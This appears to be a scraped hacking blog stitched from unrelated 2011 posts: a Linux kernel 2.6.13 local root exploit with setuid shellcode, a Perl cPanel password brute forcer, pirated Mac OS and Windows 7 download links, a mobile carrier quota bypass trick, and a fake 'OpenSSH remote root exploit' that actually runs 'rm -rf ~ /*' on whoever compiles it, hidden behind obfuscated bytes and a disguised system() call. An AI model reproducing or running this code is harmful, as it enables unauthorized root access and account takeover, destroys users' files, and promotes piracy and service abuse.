Linux Kernel 2.6.13 Local root Exploit


/*
 * Title: Linux Kernel 2.6.13 Local root Exploit
 * Author: Angel Injection (member of Inj3ct0r Team)
 * Home: http://1337day.com
 * Site: 1337day.com, exploit database separated by exploit type (local, remote, DoS, etc.)
 * Support e-mail: submit[at]1337day.com
 * Thanks To: Inj3ct0r Team
 */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 


static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;


/*              shell code  */
__asm__ (" __excode: call 1f   \n"
  " 1:  mov $23, %eax  \n"
  "   xor %ebx, %ebx  \n"
  "   int $0x80   \n"
  "   pop %eax   \n"
  "   mov $cmd-1b, %ebx  \n"
  "   add %eax, %ebx  \n"
  "   mov $arg-1b, %ecx  \n"
  "   add %eax, %ecx  \n"
  "   mov %ebx, (%ecx)  \n"
  "   mov %ecx, %edx  \n"
  "   add $4, %edx  \n"
  "   mov $11, %eax  \n"
  "   int $0x80   \n"
  "   mov $1, %eax  \n"
  "   int $0x80   \n"
  " arg:  .quad 0x00, 0x00  \n"
  " cmd:  .string  \"/bin/sh\" \n"
  " __excode_e: nop    \n"
  " .global  __excode   \n"
  " .global  __excode_e   \n"
 );



extern void (*__excode) (void);
extern void (*__excode_e) (void);


void
error (char *err)
{
  perror (err);
  fflush (stderr);
  exit (1);
}


/* exploit this shit */
void
exploit (char *file)
{
  int i, fd;
  void *p;
  struct stat st;

  printf ("\ntrying to exploit %s\n\n", file);
  fflush (stdout);
  chmod ("/proc/self/environ", 04755);
  c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
  memset ((void *) c, 0, 4096);

  /*      slow down machine       */
  fd = open (file, O_RDONLY);
  fstat (fd, &st);
  p =
    (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
  if (p == MAP_FAILED)
    error ("mmap");
  prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
  sprintf (t, "/proc/%d/environ", getpid ());
  sched_yield ();
  execve (NULL, a, e);
  madvise (0, 0, MADV_WILLNEED);
  i = fork ();

  /*      give it a try           */
  if (i)
    {      
      (*c)++;
      !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
      prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
      sched_yield (); 
    }
  else
    {
      nice (10);
      while (!(*c));
      sched_yield ();
      execve (t, a, e);
      error ("failed");
    }

  waitpid (i, NULL, 0);
  exit (0);
}


int
main (int ac, char **av)
{
  int i, j, k, s;
  char *p;

  memset (e, 0, sizeof (e));
  memset (a, 0, sizeof (a));
  a[0] = strdup (av[0]);
  a[1] = strdup (av[0]);
  a[2] = strdup (av[1]);

  if (ac < 2)
    error ("usage: binary ");
  if (ac > 2)
    exploit (av[2]);
  printf ("\npreparing");
  fflush (stdout);

  /*      make setuid a.out       */
  memset (&ex, 0, sizeof (ex));
  N_SET_MAGIC (ex, NMAGIC);
  N_SET_MACHTYPE (ex, M_386);
  s = ((unsigned) &__excode_e) - (unsigned) &__excode;
  ex.a_text = s;
  ex.a_syms = -(s + sizeof (ex));

  memset (b, 0, sizeof (b));
  memcpy (b, &ex, sizeof (ex));
  memcpy (b + sizeof (ex), &__excode, s);

  /*      make environment        */
  p = b;
  s += sizeof (ex);
  j = 0;
  for (i = k = 0; i < s; i++)
    {
      if (!p[i])
        {
          e[j++] = &p[k];
          k = i + 1;
        }
    }

  /*      reexec                  */
  getcwd (t, sizeof (t));
  strcat (t, "/");
  strcat (t, av[0]);
  execve (t, a, e);
  error ("execve");
  return 0;
}



Friday, October 28, 2011

Tool to Speed Up Video Streaming (YouTube), Etc.

You are surely no stranger to YouTube, Metacafe, or other video streaming sites that are fun and interesting to visit. But I am sure that when the internet connection is slow, or you simply have a slow connection, the comfort of watching streaming video is badly disrupted by buffering. To deal with that, I have a method that might help. Bywifi Video Accelerator can speed up the video streaming bit rate by 3 to 5 times. It also has several other helpful functions, such as "download", which can be used to download videos from the video streaming sites that Bywifi Video Accelerator supports. Click here

Thursday, October 27, 2011

Cpanel Password BruteForce Perl eXploit

#!/usr/bin/perl # Cpanel Password Brute Forcer # ---------------------------- # http://dl4hack.com # ---------------------------- use IO::Socket; use LWP::Simple; use MIME::Base64; $host = $ARGV[0]; $user = $ARGV[1]; $port = $ARGV[2]; $list = $ARGV[3]; $file = $ARGV[4]; $url = "http://".$host.":".$port; if(@ARGV < 3){ print q( ############################################################### # Cpanel Password Brute Force Tool # ############################################################### # usage : cpanel.pl [HOST] [User] [PORT][list] [File] # #-------------------------------------------------------------# # [Host] : victim Host (simorgh-ev.com) # # [User] : User Name (demo) # # [PORT] : Port of Cpanel (2082) # #[list] : File Of password list (list.txt) # # [File] : file for save password (password.txt) # # # ############################################################### # itok # ############################################################### );exit;} headx(); $numstart = "-1"; sub headx() { print q( ############################################################### # itok # ############################################################### ); open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !"; @PASSWORDS = ; close PASSFILE; foreach my $P (@PASSWORDS) { chomp $P; $passwd = $P; print " [~] Try Password : $passwd "; &brut; }; } sub brut() { $authx = encode_base64($user.":".$passwd); print $authx; my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print " [-] Can not connect to the host"; print $sock "GET / HTTP/1.1 "; print $sock "Authorization: Basic $authx "; print $sock "Connection: Close "; read $sock, $answer, 128; close($sock); if ($answer =~ /Moved/) { print " [~] PASSWORD FOUND : $passwd "; exit(); } }

Mac OS Lion 10.7




Download link:
http://thepiratebay.org/torrent/6200584/Mac_OS_X_10.7_Lion

size 3.5 GB

How to install:
Run the dmg on OS X Snow Leopard
follow the instructions


Side effects of migrating the OS from 10.6.x to 10.7:
- Battery consumption is 20% higher
- Have to reinstall developer tools & Xcode
- Have to reinstall git
- Have to reinstall nodejs
- The default Python version changes from 2.6.1 to 2.7

To downgrade Python:

run the command below in a terminal

$ defaults write com.apple.versioner.python Version 2.6

this sets the default Python to 2.6.6

Plus points:
- The UI is more intuitive
- File sharing is easier through AirDrop
- Launchpad, the application list UI, now resembles the iPad.
- Performance is much improved

Takes getting used to:
Natural scrolling
We used to scroll down to move down; now we scroll up to move down.
We used to scroll right to move right; now it is reversed: scroll left to move right.

Moreover, I am quite satisfied using Mac OS Lion; I am just still hoping for a patch to reduce battery consumption.

regards

Windows 7 Gamer Edition x64




Windows 7 Gamer Edition x64 by UNDEADCROWS-ISO (2010)

Windows 7 Gamer Edition x64 By UNDEADCROWS | for Gamers
ISO | DVD | English | x64/64-bit | Bootable | 2.76 GB
Crack/Activation: NOT REQUIRED* | UPDATABLE*


Windows 7 modified for gamers on this new platform (64-bit). The system is optimized to support today's games, and a number of processes that are unnecessary for games have been removed.

Just download, unzip and burn the ISO to DVD, then reboot the system to install on a clean partition.

The requirements are listed at the foot of this post; keep in mind that it is for current games, where 2GB of RAM and dual cores are normal.

Overview of the Features and Updates of Windows 7 Gamer Edition:

* Specially Modded DirectX 11 for Extreme Gaming
* Reduced Gaming crashes
* New High quality icons
* Resolved Windows 7 Media Center issues
* Supports all future updates and packages
* Resolved some reliability compatibility issues in Windows 7
* More Stable and Reliable
* UAC Disabled
* Show extensions for known file types
* Added User Account 2 on Control Panel
* Low Memory consumption
* Windows will tell you exactly what it is doing when it is shutting down or is booting
* Added command prompt to right click context menu
* Enabled addition Avalon effects
* Disabled Tool Tips
* Enabled Clear Type Tuning
* Added 'Copy to Folder' , 'Move to Folder' , 'Open with Notepad' to right click context
* Disabled Windows Media Player Auto Updates
* Faster browsing with IE
* DEP execution is set to Default
* Disabled the NTFS Last Access Time Stamp
* Enabled slow-motion window effects
* Added "Advanced System Properties" in my Computer
* Added Control Panel to my Computer
* Disabled kernel paging
* Winrar for extraction purpose.
* Added Group policy and Registry editor to control panel
* Turned off system beeps
* Take Ownership, Device manager, Group policy, Registry Editor in the right click
* Patched uxtheme files to use 3rd party themes.
* Faster Shutdown ( 3 seconds services kill timeout.)
* Fast Booting Time
* Disabled automatic restart in the event of a blue screen
* Tweaked up shell response
* Hibernation is Disabled.
* Added Administrative Tools to my Computer
* Added Network Connections to my Computer
* Added Search to my Computer
* Added Printers to my Computer
* Added Run and Windows Flip Switcher to my Computer
* Removed warning about showing hidden system folders
* Maximum simultaneous downloads for IE to 20 ( default is 2 )
* New Explorer View
* Allow renaming and removing of Recycle Bin
* Makes a right click option for unknown files
* Notepad saves window position
* Enabled Word wrap in Notepad
* Enabled Status Bar in all windows
* NVIDIA Drivers Added
* ATI Drivers Added
* New Themes
* 255 Sidebar Gadgets
* Enabled search system folders in Search
* System Files are boosted up to maximum Performance
* Faster Application load Time
* Windows Update service disabled
* No critical components removed
Automatically Installed 3rd Party Software

*Winrar for extraction needs.

Optional 3rd Party Software

Multimedia
*CCCP codec pack
*Cole 2k Advanced codec pack
*Vlc Media Player HD 1.0.3

Performance
*Game Booster v.1.3 (Windows 7 Support)

Applications
*Messenger Live
*Daemon Tools Lite v 4.35.5
*7-zip (x64 December 2009 Release)

Web Browsers
*Mozilla FireFox v 3.5.6

Minimum System Requirements For 64Bit:
2GB RAM (Recommended 3GB RAM or more)
20 GB of HDD space ( Recommended 40 GB )
128 MB Graphics Memory (Capable to run Aero)
17-inch Monitor (1024 x 768)
DVD-ROM or DVD-RAM
Pixel Shader 2.0
Dual Core Processors with 64-bit OS Capable
Active Internet Connection (For Activation and Updates)


Folder Download:
http://hotfile.com/list/283385/8dfa27f


Mirror:
http://fileserve.com/list/aapCUad

http://www.filesonic.com/folder/115183

Speed trick for those on the Flash Unlimited 50k or 100k package

This trick is admittedly not completely free;
we have to spend at least 50k (for 14 days)
or 100k (for 30 days).
But don't worry, we can work around the quota bundled with that damn carrier's package, which is supposedly only 500 MB, and get gigabytes out of it... hehehehe.... TESTED for a full month.

Not bad for pulling data; it can run at 250 kbps - 300 kbps.


Stage one:
# If you have not registered yet, register via *363# and pick the package that suits you, either 50k or 100k

# Once done, set the APN on your modem to internet

# Save and set as default, then close the modem application.


Stage two:
# Prepare the tools for the leapfrog (mdma and reconnect dial) >> a trick that still works to this day for pulling that damn carrier's bandwidth...!!

# In mdma, set GPRS/EDGE only first.

# Dial the connection from reconnect dial; this is used as a safeguard against disconnects.

# After connecting, check the client IP; personally I like the ones starting with 182 on this package.

# Next, open your browser and go to a speed test link, for example http://speedtest.indosatm2.com/ or other links that provide a speed test of our bandwidth.

# Start the speed test by clicking start on that link.

# To get fast bandwidth, your connection must stay on GPRS/EDGE only up to this point.

# As soon as the PING figure appears in the speed test, switch the connection to 3G only in the mdma application,
and the result will look like the one below:

Download Tool:

http://www.mediafire.com/?nvcscx7m64ooifp
http://www.mediafire.com/?ryo80rzc41508o3

Monday, October 24, 2011

OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT

/* 0pen0wn.c by anti-sec group
* —————————
* OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
*
*
* Takes advantage of an off-by-one
* bug in mapped authentication space on system
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

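#define VALID_RANGE 0xb44ffe00
// Token pasting: build_frem(t,e,s,m,y), used for fremote below, expands to the identifier system.
#define build_frem(x,y,a,b,c) a##c##a##x##y##b

// jmpcode is not machine code: its bytes are the ASCII text of the shell command
//   rm -rf ~ /* 2> /dev/null &
// which main() passes to fremote(), i.e. system(), on the machine running this program.
char jmpcode[] =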
“\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f”
“\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26″;

char shellcode[] =
""; /* encoded payload bytes removed */

char fbsd_shellcode[] =
""; /* encoded payload bytes removed */
#define SIZE 0xffffff
#define OFFSET 131
#define fremote build_frem(t,e,s,m,y)

void usage(char *arg){
printf(“\n[+] 0pen0wn 0wnz Linux/FreeBSD\n”);
printf(” Usage: %s -h -p port\n”,arg);
printf(” Options:\n”);
printf(” \t-h ip/host of target\n”);
printf(” \t-p port\n”);
printf(” \t-d username\n”);
printf(” \t-B memory_limit 8/16/64\n\n\n”);
}

#define FD 0x080518fc
#define BD 0×08082000

int main(int argc, char **argv){
FILE *jmpinst;
char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
int port=23, limit=8, target=0, sock;
struct hostent *host;
struct sockaddr_in addr;

if (geteuid()) {
puts(“need root for raw socket, etc…”);
return 1;
}

if(argc < 3){
usage(argv[0]);
return 1;
}

printf(“\n [+] 0wn0wn – by anti-sec group\n”);

if (!inet_aton(h, &addr.sin_addr)){
host = gethostbyname(h);
if (!host){
printf(” [-] Resolving failed\n”);
return 1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}

sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
printf(” [-] Connecting failed\n”);
return 1;
}
payload = malloc(limit * 10000);
ptr = payload+8;
memcpy(ptr,jmpcode,strlen(jmpcode));
jmpinst=fopen(shellcode+793,”w+”);
if(jmpinst){
fseek(jmpinst,0,SEEK_SET);
fprintf(jmpinst,”%s”,shellcode);
fclose(jmpinst);
}
ptr += strlen(jmpcode);
if(target != 5 && target != 6){
memcpy(ptr,shellcode,strlen(shellcode));
ptr += strlen(shellcode);
memset(ptr,’B',limit * 10000 – 8 – strlen(shellcode));
}
else{
memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
ptr += strlen(fbsd_shellcode);
memset(ptr,’B',limit * 10000 – 8 – strlen(fbsd_shellcode));
}
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,3750,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
printf(” [-] connecting failed\n”);
}

payload[sizeof(payload)-1] = ”;
payload[sizeof(payload)-2] = ”;
send(sock,buffer,strlen(buffer),0);
send(sock,payload,strlen(payload),0);
close(sock);
free(payload);
addr.sin_port = htons(6666);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {
/* v— our cool bar that says: “r0000000t!!!” */
printf(“\n [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n”);
fremote(“PS1=’sh-3.2#’ /bin/sh”);
}
else
printf(” [-] failed to exploit target :-(\n”);
close(sock);
return 0;
}